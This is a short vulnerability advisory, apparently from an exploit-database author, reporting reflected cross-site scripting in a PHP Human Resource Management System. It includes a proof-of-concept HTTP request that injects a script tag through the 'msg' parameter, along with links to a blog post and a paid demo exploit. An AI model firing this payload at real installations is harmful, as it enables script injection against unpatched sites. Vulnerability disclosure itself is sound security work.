## Titles: © 2024 Human Resource Management-1.0-HRM-1.0 Cross-site scripting (reflected)
## Author: nu11secur1ty
## Date: 11/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
The value of the `msg` request parameter is copied into the HTML document as plain text between tags. The payload q28py<script>alert(1)</script>tam5e was submitted in the msg parameter. This input was echoed unmodified in the application's response.
STATUS: HIGH- Vulnerability
[+]PoC:
```
GET /hrm/user/index.php?msg=Username%20and%20Password%20is%20Wrong!q28py%3cscript%3ealert(1)%3c%2fscript%3etam5e HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: http://a861ac1a-1dd8-4dc7-abad-74505878c646.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130", "Chromium";v="130"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Info:
[href](https://www.nu11secur1ty.com/2024/11/2024-human-resource-management-10-hrm.html)
## Demo Exploit:
[href](https://www.patreon.com/posts/c-2024-human-1-0-115906392)
## Time spent:
00:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>